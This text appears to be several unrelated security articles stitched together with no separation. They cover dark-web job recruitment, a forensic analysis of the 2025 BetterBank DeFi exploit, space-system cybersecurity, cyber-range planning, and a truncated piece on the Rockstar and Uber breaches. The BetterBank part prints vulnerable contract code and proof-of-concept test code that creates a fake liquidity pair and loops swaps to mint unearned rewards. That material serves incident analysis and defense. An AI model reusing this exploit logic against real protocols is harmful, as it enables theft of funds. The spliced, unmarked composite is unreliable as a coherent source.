In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.
So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.
The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.
While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.
Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.
From August 26 to 27, 2025, BetterBank, a decentralized finance (DeFi) protocol operating on the PulseChain network, fell victim to a sophisticated exploit involving liquidity manipulation and reward minting. The attack resulted in an initial loss of approximately $5 million in digital assets. Following on-chain negotiations, the attacker returned approximately $2.7 million in assets, mitigating the financial damage and leaving a net loss of around $1.4 million. The vulnerability stemmed from a fundamental flaw in the protocol’s bonus reward system, specifically in the swapExactTokensForFavorAndTrackBonus function. This function was designed to mint ESTEEM reward tokens whenever a swap resulted in FAVOR tokens, but critically, it lacked the necessary validation to ensure that the swap occurred within a legitimate, whitelisted liquidity pool.
A prior security audit by Zokyo had identified and flagged this precise vulnerability. However, due to a documented communication breakdown and the vulnerability’s perceived low severity, the finding was downgraded, and the BetterBank development team did not fully implement the recommended patch. This incident is a pivotal case study demonstrating how design-level oversights, compounded by organizational inaction in response to security warnings, can lead to severe financial consequences in the high-stakes realm of blockchain technology. The exploit underscores the importance of thorough security audits, clear communication of findings, and multilayered security protocols to protect against increasingly sophisticated attack vectors.
In this article, we will analyze the root cause, impact, and on-chain forensics of the helper contracts used in the attack.
Incident overview
Incident timeline
The BetterBank exploit was the culmination of a series of events that began well before the attack itself. In July 2025, approximately one month prior to the incident, the BetterBank protocol underwent a security audit conducted by the firm Zokyo. The audit report, which was made public after the exploit, explicitly identified a critical vulnerability related to the protocol’s bonus system. Titled “A Malicious User Can Trade Bogus Tokens To Qualify For Bonus Favor Through The UniswapWrapper,” the finding was a direct warning about the exploit vector that would later be used. However, based on the documented proof of concept (PoC), which used test Ether, the severity of the vulnerability was downgraded to “Informational” and marked as “Resolved” in the report. The BetterBank team did not fully implement the patched code snippet.
The attack occurred on August 26, 2025. In response, the BetterBank team drained all remaining FAVOR liquidity pools to protect the assets that had not yet been siphoned. The team also took the proactive step of announcing a 20% bounty for the attacker and attempted to negotiate the return of funds.
Remarkably, these efforts were successful. On August 27, 2025, the attacker returned a significant portion of the stolen assets – 550 million DAI tokens. This partial recovery is not a common outcome in DeFi exploits.
Financial impact
This incident had a significant financial impact on the BetterBank protocol and its users. Approximately $5 million worth of assets was initially drained. The attack specifically targeted liquidity pools, allowing the perpetrator to siphon off a mix of stablecoins and native PulseChain assets. The drained assets included 891 million DAI tokens, 9.05 billion PLSX tokens, and 7.40 billion WPLS tokens.
In a positive turn of events, the attacker returned approximately $2.7 million in assets, specifically 550 million DAI. These funds represented a significant portion of the initial losses, resulting in a final net loss of around $1.4 million. This figure speaks to the severity of the initial exploit and the effectiveness of the team’s recovery efforts. While data from various sources show minor fluctuations in reported values due to real-time token price volatility, they consistently point to these key figures.
A detailed breakdown of the losses and recovery is provided in the following table:
Financial Metric
Value
Details
Initial Total Loss
~$5,000,000
The total value of assets drained during the exploit.
Assets Drained
891M DAI, 9.05B PLSX, 7.40B WPLS
The specific tokens and quantities siphoned from the protocol’s liquidity pools.
Assets Returned
~$2,700,000 (550M DAI)
The value of assets returned by the attacker following on-chain negotiations.
Net Loss
~$1,400,000
The final, unrecovered financial loss to the protocol and its users.
Protocol description and vulnerability analysis
The BetterBank protocol is a decentralized lending platform on the PulseChain network. It incorporates a two-token system that incentivizes liquidity provision and engagement. The primary token is FAVOR, while the second, ESTEEM, acts as a bonus reward token. The protocol’s core mechanism for rewarding users was tied to providing liquidity for FAVOR on decentralized exchanges (DEXs). Specifically, a function was designed to mint and distribute ESTEEM tokens whenever a trade resulted in FAVOR as the output token. While seemingly straightforward, this incentive system contained a critical design flaw that an attacker would later exploit.
The vulnerability was not a mere coding bug, but a fundamental architectural misstep. By tying rewards to a generic, unvalidated condition – the appearance of FAVOR in a swap’s output – the protocol created an exploitable surface. Essentially, this design choice trusted all external trading environments equally and failed to anticipate that a malicious actor could replicate a trusted environment for their own purposes. This is a common failure in tokenomics, where the focus on incentivization overlooks the necessary security and validation mechanisms that should accompany the design of such features.
The technical root cause of the vulnerability was a fundamental logic flaw in one of BetterBank’s smart contracts. The vulnerability was centered on the swapExactTokensForFavorAndTrackBonus function. The purpose of this function was to track swaps and mint ESTEEM bonuses. However, its core logic was incomplete: it only verified that FAVOR was the output token from the swap and failed to validate the source of the swap itself. The contract did not check whether the transaction originated from a legitimate, whitelisted liquidity pool or a registered contract. This lack of validation created a loophole that allowed an attacker to trigger the bonus system at will by creating a fake trading environment.
This primary vulnerability was compounded by a secondary flaw in the protocol’s tokenomics: the flawed design of convertible rewards.
The ESTEEM tokens, minted as a bonus, could be converted back into FAVOR tokens. This created a self-sustaining feedback loop. An attacker could trigger the swapExactTokensForFavorAndTrackBonus function to mint ESTEEM, and then use those newly minted tokens to obtain more FAVOR. The FAVOR could then be used in subsequent swaps to mint even more ESTEEM rewards. This cyclical process enabled the attacker to generate an unlimited supply of tokens and drain the protocol’s real reserves. The synergistic combination of logic and design flaws created a high-impact attack vector that was difficult to contain once initiated.
To sum it up, the BetterBank exploit was the result of a critical vulnerability in the bonus minting system that allowed attackers to create fake liquidity pairs and harvest an unlimited amount of ESTEEM token rewards. As mentioned above, the system couldn’t distinguish between legitimate and malicious liquidity pairs, creating an opportunity for attackers to generate illegitimate token pairs. The BetterBank system included protection measures against attacks capable of inflicting substantial financial damage – namely a sell tax. However, the threat actors were able to bypass this tax mechanism, which exacerbated the impact of the attack.
Exploit breakdown
The exploit targeted the bonus minting system of the favorPLS.sol contract, specifically the logBuy() function and related tax logic. The key vulnerable components are:
The tax only applies to transfers to legitimate, whitelisted addresses that are marked as isMarketPair[recipient]. By definition, fake, unauthorized LPs are not included in this mapping, so they bypass the maximum 50% sell tax imposed by protocol owners.
function _transfer(address sender, address recipient, uint256 amount) internal override {
uint256 taxAmount = 0;
if (_isTaxExempt(sender, recipient)) {
super._transfer(sender, recipient, amount);
return;
}
// Transfer to Market Pair is likely a sell to be taxed
if (isMarketPair[recipient]) {
taxAmount = (amount * sellTax) / MULTIPLIER;
}
if (taxAmount > 0) {
super._transfer(sender, treasury, taxAmount);
amount -= taxAmount;
}
super._transfer(sender, recipient, amount);
}
The uniswapWraper.sol contract contains the buy wrapper functions that call logBuy(). The system only checks if the pair is in allowedDirectPair mapping, but this can be manipulated by creating fake tokens and adding them to the mapping to get them approved.
function swapExactTokensForFavorAndTrackBonus(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external {
address finalToken = path[path.length - 1];
require(isFavorToken[finalToken], "Path must end in registered FAVOR");
require(allowedDirectPair[path[0]][finalToken], "Pair not allowed");
require(path.length == 2, "Path must be direct");
// ... swap logic ...
uint256 twap = minterOracle.getTokenTWAP(finalToken);
if(twap < 3e18){
IFavorToken(finalToken).logBuy(to, favorReceived);
}
}
Step-by-step attack reconstruction
The attack on BetterBank was not a single transaction, but rather a carefully orchestrated sequence of on-chain actions. The exploit began with the attacker acquiring the necessary capital through a flash loan. Flash loans are a feature of many DeFi protocols that allow a user to borrow large sums of assets without collateral, provided the loan is repaid within the same atomic transaction. The attacker used the loan to obtain a significant amount of assets, which were then used to manipulate the protocol’s liquidity pools.
The attacker used the flash loan funds to target and drain the real DAI-PDAIF liquidity pool, a core part of the BetterBank protocol. This initial step was crucial because it weakened the protocol’s defenses and provided the attacker with a large volume of PDAIF tokens, which were central to the reward-minting scheme.
Capital acquisition
After draining the real liquidity pool, the attacker moved to the next phase of the operation. They deployed a new, custom, and worthless ERC-20 token. Exploiting the permissionless nature of PulseX, the attacker then created a fake liquidity pool, pairing their newly created bogus token with PDAIF.
This fake pool was key to the entire exploit. It enabled the attacker to control both sides of a trading pair and manipulate the price and liquidity to their advantage without affecting the broader market.
One critical element that made this attack profitable was the protocol’s tax logic. BetterBank had implemented a system that levied high fees on bulk swaps to deter this type of high-volume trading. However, the tax only applied to “official” or whitelisted liquidity pairs. Since the attacker’s newly created pool was not on this list, they were able to conduct their trades without incurring any fees. This critical loophole ensured the attack’s profitability.
Fake LP pair creation
After establishing the bogus token and fake liquidity pool, the attacker initiated the final and most devastating phase of the exploit: the reward minting loop. They executed a series of rapid swaps between their worthless token and PDAIF within their custom-created pool. Each swap triggered the vulnerable swapExactTokensForFavorAndTrackBonus function in the BetterBank contract. Because the function did not validate the pool, it minted a substantial bonus of ESTEEM tokens with each swap, despite the illegitimacy of the trading pair.
Each swap triggers:
swapExactTokensForFavorAndTrackBonus()
logBuy() function call
calculateFavorBonuses() execution
ESTEEM token minting (44% bonus)
fake LP sell tax bypass
Reward minting loop
The newly minted ESTEEM tokens were then converted back into FAVOR tokens, which could be used to facilitate more swaps. This created a recursive loop that allowed the attacker to generate an immense artificial supply of rewards and drain the protocol’s real asset reserves. Using this method, the attacker extracted approximately 891 million DAI, 9.05 billion PLSX, and 7.40 billion WPLS, effectively destabilizing the entire protocol. The success of this multi-layered attack demonstrates how a single fundamental logic flaw, combined with a series of smaller design failures, can lead to a catastrophic outcome.
Economic impact comparison
Mitigation strategy
This attack could have been averted if a number of security measures had been implemented.
First, the liquidity pool should be verified during a swap. The LP pair and liquidity source must be valid.
function _transfer(address sender, address recipient, uint256 amount) internal override {
uint256 taxAmount = 0;
if (_isTaxExempt(sender, recipient)) {
super._transfer(sender, recipient, amount);
return;
}
// FIX: Apply tax to ALL transfers, not just market pairs
if (isMarketPair[recipient] || isUnverifiedPair(recipient)) {
taxAmount = (amount * sellTax) / MULTIPLIER;
}
if (taxAmount > 0) {
super._transfer(sender, treasury, taxAmount);
amount -= taxAmount;
}
super._transfer(sender, recipient, amount);
}
To prevent large-scale one-time attacks, a daily limit should be introduced to stop users from conducting transactions totaling more than 10,000 ESTEEM tokens per day.
mapping(address => uint256) public lastBonusClaim;
mapping(address => uint256) public dailyBonusLimit;
uint256 public constant MAX_DAILY_BONUS = 10000 * 1e18; // 10K ESTEEM per day
function logBuy(address user, uint256 amount) external {
require(isBuyWrapper[msg.sender], "Only approved buy wrapper can log buys");
// ADD: Rate limiting
require(block.timestamp - lastBonusClaim[user] > 1 hours, "Rate limited");
require(dailyBonusLimit[user] < MAX_DAILY_BONUS, "Daily limit exceeded");
// Update rate limiting
lastBonusClaim[user] = block.timestamp;
dailyBonusLimit[user] += calculatedBonus;
// ... rest of function
}
On-chain forensics and fund tracing
The on-chain trail left by the attacker provides a clear forensic record of the exploit. After draining the assets on PulseChain, the attacker swapped the stolen DAI, PLSX, and WPLS for more liquid, cross-chain assets. The perpetrator then bridged approximately $922,000 worth of ETH from the PulseChain network to the Ethereum mainnet. This was done using a secondary attacker address beginning with 0xf3BA…, which was likely created to hinder exposure of the primary exploitation address. The final step in the money laundering process was the use of a crypto mixer, such as Tornado Cash, to obscure the origin of the funds and make them untraceable.
Tracing the flow of these funds was challenging because many public-facing block explorers for the PulseChain network were either inaccessible or lacked comprehensive data at the time of the incident. This highlights the practical difficulties associated with on-chain forensics, where the lack of a reliable, up-to-date block explorer can greatly hinder analysis. In these scenarios, it becomes critical to use open-source explorers like Blockscout, which are more resilient and transparent.
The following table provides a clear reference for the key on-chain entities involved in the attack:
On-Chain Entity
Address
Description
Primary Attacker EOA
0x48c9f537f3f1a2c95c46891332E05dA0D268869B
The main externally owned account used to initiate the attack.
Secondary Attacker EOA
0xf3BA0D57129Efd8111E14e78c674c7c10254acAE
The address used to bridge assets to the Ethereum network.
Attacker Helper Contracts
0x792CDc4adcF6b33880865a200319ecbc496e98f8, etc.
A list of contracts deployed by the attacker to facilitate the exploit.
PulseXRouter02
0x165C3410fC91EF562C50559f7d2289fEbed552d9
The PulseX decentralized exchange router contract used in the exploit.
We managed to get hold of the attacker’s helper contracts to deepen our investigation. Through comprehensive bytecode analysis and contract decompilation, we determined that the attack architecture was multilayered. The attack utilized a factory contract pattern (0x792CDc4adcF6b33880865a200319ecbc496e98f8) that contained 18,219 bytes of embedded bytecode that were dynamically deployed during execution. The embedded contract revealed three critical functions: two simple functions (0x51cff8d9 and 0x529d699e) for initialization and cleanup, and a highly complex flash loan callback function (0x920f5c84) with the signature executeOperation(address[],uint256[],uint256[],address,bytes), which matches standard DeFi flash loan protocols like Aave and dYdX. Analysis of the decompiled code revealed that the executeOperation function implements sophisticated parameter parsing for flash loan callbacks, dynamic contract deployment capabilities, and complex external contract interactions with the PulseX Router (0x165c3410fc91ef562c50559f7d2289febed552d9).
contract BetterBankExploitContract {
function main() external {
// Initialize memory
assembly {
mstore(0x40, 0x80)
}
// Revert if ETH is sent
if (msg.value > 0) {
revert();
}
// Check minimum calldata length
if (msg.data.length < 4) {
revert();
}
// Extract function selector
uint256 selector = uint256(msg.data[0:4]) >> 224;
// Dispatch to appropriate function
if (selector == 0x51cff8d9) {
// Function: withdraw(address)
withdraw();
} else if (selector == 0x529d699e) {
// Function: likely exploit execution
executeExploit();
} else if (selector == 0x920f5c84) {
// Function: executeOperation(address[],uint256[],uint256[],address,bytes)
// This is a flash loan callback function!
executeOperation();
} else {
revert();
}
}
// Function 0x51cff8d9 - Withdraw function
function withdraw() internal {
// Implementation would be in the bytecode
// Likely withdraws profits to attacker address
}
// Function 0x529d699e - Main exploit function
function executeExploit() internal {
// Implementation would be in the bytecode
// Contains the actual BetterBank exploit logic
}
// Function 0x920f5c84 - Flash loan callback
function executeOperation(
address[] calldata assets,
uint256[] calldata amounts,
uint256[] calldata premiums,
address initiator,
bytes calldata params
) internal {
// This is the flash loan callback function
// Contains the exploit logic that runs during flash loan
}
}
The attack exploited three critical vulnerabilities in BetterBank’s protocol: unvalidated reward minting in the logBuy function that failed to verify legitimate trading pairs; a tax bypass mechanism in the _transfer function that only applied the 50% sell tax to addresses marked as market pairs; and oracle manipulation through fake trading volume. The attacker requested flash loans of 50M DAI and 7.14B PLP tokens, drained real DAI-PDAIF pools, and created fake PDAIF pools with minimal liquidity. They performed approximately 20 iterations of fake trading to trigger massive ESTEEM reward minting, converting the rewards into additional PDAIF tokens, before re-adding liquidity with intentional imbalances and extracting profits of approximately 891M DAI through arbitrage.
PoC snippets
To illustrate the vulnerabilities that made such an attack possible, we examined code snippets from Zokyo researchers.
First, a fake liquidity pool pair is created with FAVOR and a fake token is generated by the attacker. By extension, the liquidity pool pairs with this token were also unsubstantiated.
function _createFakeLPPair() internal {
console.log("--- Step 1: Creating Fake LP Pair ---");
vm.startPrank(attacker);
// Create the pair
fakePair = factory.createPair(address(favorToken), address(fakeToken));
console.log("Fake pair created at:", fakePair);
// Add initial liquidity to make it "legitimate"
uint256 favorAmount = 1000 * 1e18;
uint256 fakeAmount = 1000000 * 1e18;
// Transfer FAVOR to attacker
vm.stopPrank();
vm.prank(admin);
favorToken.transfer(attacker, favorAmount);
vm.startPrank(attacker);
// Approve router
favorToken.approve(address(router), favorAmount);
fakeToken.approve(address(router), fakeAmount);
// Add liquidity
router.addLiquidity(
address(favorToken),
address(fakeToken),
favorAmount,
fakeAmount,
0,
0,
attacker,
block.timestamp + 300
);
console.log("Liquidity added to fake pair");
console.log("FAVOR in pair:", favorToken.balanceOf(fakePair));
console.log("FAKE in pair:", fakeToken.balanceOf(fakePair));
vm.stopPrank();
}
Next, the fake LP pair is approved in the allowedDirectPair mapping, allowing it to pass the system check and perform the bulk swap transactions.
These steps enable exploit execution, completing FAVOR swaps and collecting ESTEEM bonuses.
function _executeExploit() internal {
console.log("--- Step 3: Executing Exploit ---");
vm.startPrank(attacker);
uint256 exploitAmount = 100 * 1e18; // 100 FAVOR per swap
uint256 iterations = 10; // 10 swaps
console.log("Performing %d exploit swaps of %d FAVOR each", iterations, exploitAmount / 1e18);
for (uint i = 0; i < iterations; i++) {
_performExploitSwap(exploitAmount);
console.log("Swap %d completed", i + 1);
}
// Claim accumulated bonuses
console.log("Claiming accumulated ESTEEM bonuses...");
favorToken.claimBonus();
vm.stopPrank();
}
We also performed a single swap in a local environment to demonstrate the design flaw that allowed the attackers to perform transactions over and over again.
function _performExploitSwap(uint256 amount) internal {
// Create swap path: FAVOR -> FAKE -> FAVOR
address[] memory path = new address[](2);
path[0] = address(favorToken);
path[1] = address(fakeToken);
// Approve router
favorToken.approve(address(router), amount);
// Perform swap - this triggers logBuy() and mints ESTEEM
router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
amount,
0, // Accept any amount out
path,
attacker,
block.timestamp + 300
);
}
Finally, several checks are performed to verify the exploit’s success.
function _verifyExploitSuccess() internal {
uint256 finalFavorBalance = favorToken.balanceOf(attacker);
uint256 finalEsteemBalance = esteemToken.balanceOf(attacker);
uint256 esteemMinted = esteemToken.totalSupply() - initialEsteemBalance;
console.log("Attacker's final FAVOR balance:", finalFavorBalance / 1e18);
console.log("Attacker's final ESTEEM balance:", finalEsteemBalance / 1e18);
console.log("Total ESTEEM minted during exploit:", esteemMinted / 1e18);
// Verify the attack was successful
assertGt(finalEsteemBalance, 0, "Attacker should have ESTEEM tokens");
assertGt(esteemMinted, 0, "ESTEEM tokens should have been minted");
console.log("EXPLOIT SUCCESSFUL!");
console.log("Attacker gained ESTEEM tokens without legitimate trading activity");
}
Conclusion
The BetterBank exploit was a multifaceted attack that combined technical precision with detailed knowledge of the protocol’s design flaws. The root cause was a lack of validation in the reward-minting logic, which enabled an attacker to generate unlimited value from a counterfeit liquidity pool. This technical failure was compounded by an organizational breakdown whereby a critical vulnerability explicitly identified in a security audit was downgraded in severity and left unpatched.
The incident serves as a powerful case study for developers, auditors, and investors. It demonstrates that ensuring the security of a decentralized protocol is a shared, ongoing responsibility. The vulnerability was not merely a coding error, but rather a design flaw that created an exploitable surface. The confusion and crisis communications that followed the exploit are a stark reminder of the consequences when communication breaks down between security professionals and protocol teams. While the return of a portion of the funds is a positive outcome, it does not overshadow the core lesson: in the world of decentralized finance, every line of code matters, every audit finding must be taken seriously, and every protocol must adopt a proactive, multilayered defense posture to safeguard against the persistent and evolving threats of the digital frontier.
Working as a cybersecurity engineer for many years, and closely following the rapid evolution of the space ecosystem, I wholeheartedly believe that space systems today are targets of cyberattacks more than ever.
The purpose of this article is to give you a glimpse of cybersecurity threats and challenges facing the New Space economy and ecosystem, with a focus on smallsats in Low Earth Orbit (LEO), as well as some technologies to assess space cybersecurity risks.
The article series is divided into four parts: Introduction to New Space, Threats in the New Space, Secure the New Space, and finally New Space Future Development and Challenges.
Introduction
The Aerospace and Defense industry is a global industry composed of many companies that design, manufacture, and service commercial and military aircraft, ships, spacecraft, weapons systems, and related equipment.
The Aerospace and Defense industry is composed of different key segments: large defense prime contractors/system integrators, commercial aerospace prime contractors or system integrators, first-tier subcontractors, second-tier subcontractors, and finally third-tier and fourth-tier subcontractors.
The industry is facing enormous challenges that stem from the COVID-19 pandemic, concerns over sustainability, disruptions from new technologies, heightened regulatory forces, radically transforming ecosystems, and, above all, the cyber threats and attacks that are getting more and more worrisome.
The increase of space cyberattacks and cybersecurity risks is stemming from the evolution of the space ecosystem to the New Space Age.
In this first article of the series, we will focus on the New Space notion and the definition of space system architecture.
From Old Space to New Space
Earlier, the space industry was a nation-level domain — and not just any nation; the United States of America and the Union of Soviet Socialist Republics dominated the industry. Space was related to governments and defense departments, and the objectives were essentially political and strategic ones.
Now, there is more involvement in space globally than ever before in history. This new era, led by private space efforts, is known as “New Space Age” — a movement that views space not as a location or metaphor, but as well of resources, opportunities, and mysteries yet to be unlocked.
New Space is evolving rapidly with industry privatization and the birth of new ventures to achieve greater space accessibility for different parties.
Nevertheless, this development in technologies and the fast growth of New Space projects make the space attack surface larger and increase the threat risks in terms of cyberattacks.
Space and Satellite Systems
LEO and CubeSats
LEO is a circular orbit around the earth with an altitude of 2,000Km or less (1,200 miles).
Most LEO Space Vehicles (SV) are small satellites, also known as CubeSats or Smallsats.
A CubeSat is a small, low-cost satellite that can be developed and launched by colleges, high schools, and even individuals. The 1U (Unit) size of a CubeSat is (10cm x 10cm x 10cm) and weighs about 1Kg. A CubeSat can be used alone (1U) or in groups (up to 24 U).
CubeSats represent paradigm shifts in developing space missions in the New Space Age.
Nowadays, CubeSats, and all the other SV types, are facing different challenges: environmental challenges, operational challenges, and cybersecurity challenges.
Space System Design
Any space system is composed of three main segments: ground segment, space segment, and link segment. In addition, we have the user segment.
Ground segment: The ground segment includes all the terrestrial elements of the space systems and allows the command, control, and management of the satellite itself and the data coming from the payload and transmitted to the users.
Space segment: The space segment includes the satellites, tracking, telemetry, command, control, monitoring, and related facilities and equipment used to support the satellite’s operations.
Link/communication segment: The link or communication segment is the data and signals exchanged between the ground and space segments.
User segment: The user segment includes user terminals and stations that can launch operations with the satellite in the form of signal transmissions and receptions.
Conclusion
The New Space age makes the space field more accessible to everyone on this planet. It’s about democratizing access to space.
This new age was characterized by the increase of Smallsats development and especially CubeSats in LEO. These types of satellites are part of the space architecture in addition to the ground, communication, and user segments. Nevertheless, is this space system design threatened by cyberattacks?
In the next article in the series, we will explore the answer to this question.
In the last few years, IBM X-Force has seen an unprecedented increase in requests to build cyber ranges. By cyber ranges, we mean facilities or online spaces that enable team training and exercises of cyberattack responses. Companies understand the need to drill their plans based on real-world conditions and using real tools, attacks and procedures.
What’s driving this increased demand? The increase in remote and hybrid work models emerging from the COVID-19 pandemic has elevated the priority to collaborate and train together as a team with the goal of being prepared for potential incidents.
Another force driving demand for cyber ranges is the rapid growth of high-profile attacks with seven-figure loss events and the public disclosure of attacks, impacting reputation and financial results. Damaging attacks, like data breaches and ransomware, have cemented the criticality of effective incident response to prevent worst-case outcomes and rapidly contain eventual ones.
Once you decide that your cybersecurity team and other actors in your cyberattack response protocols need to practice together, the economics for a dedicated cyber range is compelling. An organization can train many more employees more quickly through a dedicated cyber range.
But before you pull the trigger and order a cyber range, you should make a full evaluation of the pros and cons. The primary con, of course, is that a dedicated cyber range might be oversized for the organization’s long-term needs. You might not use it enough to justify the costs of building and operating an actual range. Alternatively, you might prefer to run cyberattack exercises remotely to more closely simulate the real work environment of your teams.
This post will provide a primer on conducting a graduated cyber range evaluation and help set up processes to think through what type of drilling grounds might be best suited for your team.
Why Build a Cyber Range? Mandatory Training, Certifications and Compliance
The most compelling reason for building a cyber range is that it is one of the best ways to improve the coordination and experience level of your team. Experience and practice enhance teamwork and provide the necessary background for smart decision-making during a real cyberattack. Cyber ranges are one of the best ways to run real attack scenarios and immerse the team in a live response exercise.
An additional reason to have access to a cyber range is that many compliance certifications and insurance policies cite mandatory cyber training of various degrees. These are driven by mandates and compliance standards established by the National Institute of Standards and Technology and the International Organization for Standardization (ISO). With these requirements in place, organizations are compelled to free up budgets for relevant cyber training.
There are different ways to fulfill these training requirements. Per their role in the company, employees can be required to undergo certifications by organizations such as the SANS Institute. Training mandates can also be fulfilled by micro-certifications and online coursework using remote learning and certification platforms, such as Coursera. The decision to avail a company of a cyber range does not always mean building one in-house.
A Cyber Training Progression in Stages: From Self-Study to Fully Operational Cyber Ranges
In talking with our customers, we offer them multiple options for cyber range setups, and we advise them to carry out the implementation in stages. Each stage is appropriate for a different level of commitment, activity and desire for a fully immersive cyber range experience.
Stage 1: Self-Training, Certifications and Labs
Stage 1 is blocking and tackling, the bare minimum for competent cybersecurity training. This provides the basics required for continuing education and fulfilling cyber training requirements. Stage 1 can include:
SANS training course in desired areas of expertise
Completion of Coursera online self-paced or Massive Open Online Course classes with requisite certification of completion
Specific class focus, such as reverse engineering malware or network forensics to explain how attackers traverse networks without being detected, etc.
An added part to Stage 1 is holding hands-on labs where participants complete tasks or simulate blue team or red team activities. The labs should focus on outcomes and metrics as much as they focus on completion. Participants should understand whether they are able to efficiently and effectively find indicators of compromise and mitigate attacks, as well as map the primary tactics, techniques and procedures (TTPs) associated with those attack simulations.
Stage 2: Team and Wider-Scale Corporate Exercises
In Stage 2, the more mature companies can escalate to coordinated group exercises that are planned and follow a curriculum. This requires dedicated compute infrastructure or hardware (some organizations choose to do it all from their existing workstations). In these exercises, all stakeholders take the lessons they have learned and bring them together to orchestrate a coordinated response. You may choose to have red teams attempt to infiltrate and go up against blue teams and involve threat intelligence teams and other security staff in the company’s security operations center.
If you want to make this stage a more immersive and realistic experience, you may also choose to include other teams, such as marketing. Bringing in operational technology (OT) teams at this stage is strongly suggested. Many of the most recent ransomware attacks have targeted not just laptops and other IT devices but also OT devices.
Business leaders tend to benefit strongly from witnessing and experiencing immersive coordinated exercises. Giving them insights into what other teams are experiencing and how they need to respond provides invaluable context that comes into play during an actual crisis. The most advanced team cyber response exercises can involve dozens or hundreds of team members and last several days.
Stage 3: The Collaborative Cyber Range With Vendors, Customers and Partners
Coordinating responses for your organization is a great start. But what about those around you — your customers, vendors and partners? The nature of your digital infrastructure, the ubiquitous connection to application programming interfaces, the proliferation of connected devices and the varying types of connections make it critical to coordinate an attack response with your closest third parties.
It’s easy to understand the criticality of an orchestrated response. The world has become more and more connected; the digital links among vendors, customers and partners have grown. An organization can have hundreds of third-party connections at a time. This has increased the attack surface and made supply chain attacks a preferred tactic with cyber criminals and nation-state actors alike. Supply chain attacks can be hard to detect because they come through a trusted intermediary. They are also a general-purpose exploit for securing future access, traversing networks and expanding horizontally inside an organization.
With awareness of third-party risk management, software supply chain risk growing and attacks in this realm more complex than ever, we are seeing customers asking to take their cyber readiness and exercises to the ecosystem level.
More than a concept to eventually consider, we actually see some companies demanding this participation as a condition of a partnership or becoming a key vendor. Chief information security officers (CISOs) and risk teams want to see beyond the attestations of SOC2 or ISO 2700 and test out the actual capabilities and readiness of their core partners and vendors.
For example, if an organization uses a bank that employs a payment processor that subsequently uses a clearinghouse, all three are tightly knit and have likely established some playbooks on how to work together, how to identify where the chain of interactions encounters a problem or when a breach has occurred. Ultimately, they should know how to contain and stop a cyberattack involving one or more of the three entities. Proactively establishing a risk-aware working relationship and identifying and introducing specific risks for each stakeholder can facilitate a more robust, comprehensive and rapid response in case of an attack. Often this is the point of bringing several parties into the collaborative exercise: to set up the procedures and norms for a collaborative response that’s agile and precise.
Keeping Your Training and Range Lively With Fresh Content and Context
A key part of why we believe organizations are seeking to build their own cyber ranges is the rapid acceleration of attack types and the extent of attacks. Threats that used to emerge over the course of months now emerge in weeks or days. CISOs and risk management leaders recognize this and understand that there are two key ways to address this shift:
Increase the frequency of exercises
Improve the content of exercises to keep things fresh over time
With cyber ranges, we can use both static, curriculum-driven content for stage 1 exercises and push evolving content with industry context for those moving to more elaborate exercises. We typically insert lessons and exercises based on attacks that may be happening concurrently with the exercise itself.
Ideally, you want your range to allow for customizable content that can be modified on the fly. This allows a company with a cyber range to load up an exercise on a major attack days after the attack is revealed. That capability makes cyber ranges more relevant and valuable because it enables organizations to speed up their security metabolism and learn faster.
Conclusion: Are You Ready for a Dedicated Cyber Range?
Before you get to the point of thinking about a dedicated cyber range, we highly recommend you work through stage 1 and stage 2 capabilities. At a minimum, you should run a cyber range exercise as a one-off to see how it works for your team and your organization. Most crucially, consider what the utilization rate of your cyber range will be when planning. Ideally, it should be in use most of the time to maximize your investment. Think through whether this is viable for your team and your enterprise before pulling the trigger. As a mitigating factor, think through whether you can use your dedicated cyber range as a pop-up or quick-start cyber operations command center in case of emergency.
After you feel comfortable with the idea of a cyber range and have confirmed its value, consider the positives and negatives of the three types of cyber ranges or outsourcing exercises to a trusted vendor.
Dedicated on-premise ranges are more expensive to build and maintain but can help teams create in-person chemistry. This has become a more viable option in the past year as more workforces are convening in person again.
Creating an entirely virtual cyber range prior to the pandemic was not something many organizations were considering. Virtual versions are cheaper to stand up and upgrade and offer more flexibility. However, for some organizations, face-to-face interactions are important.
A number of customers have come to us requesting hybrid versions with both virtual and in-person components. Hybrid models are flexible and can extend to vendors and partners but are also the more expensive installations.
Having a cyber range at the ready is a fabulous foundation for upping your security metabolism and readiness. Follow a rigorous decision-making process to ensure you get the right kind for your organization and needs. To learn whether a cyber range is right for your organization and how to set up a cyber range program, talk to IBM X-Force Cyber Range Consulting here.
On September 19, 2022, an 18-year-old cyberattacker known as “teapotuberhacker” (aka TeaPot) allegedly breached the Slack messages of game developer Rockstar Games. Using this access, they pilfered over 90 videos of the upcoming Grand Theft Auto VI game. They then posted those videos on the fan website GTAForums.com. Gamers got an unsanctioned sneak peek of game footage, characters, plot points and other critical details. It was a game developer’s worst nightmare.
In addition, the malicious actor claimed responsibility for a similar security breach affecting ride-sharing company Uber just a week prior. According to reports, they infiltrated the company’s Slack by tricking an employee into granting them access. Then, they spammed the employees with multi-factor authentication (MFA) push notifications until they gained access to internal systems, where they could browse the source code.
Incidents like the Rockstar and Uber hacks should serve as a warning to all CISOs. Proper security must consider the role info-hungry actors and audiences can play when dealing with sensitive information and intellectual property.
Stephanie Carruthers, Chief People Hacker for the X‑Force Red team at IBM Security, broke down how the incident at Uber happened and what helps prevent these types of attacks.
“But We Have MFA”
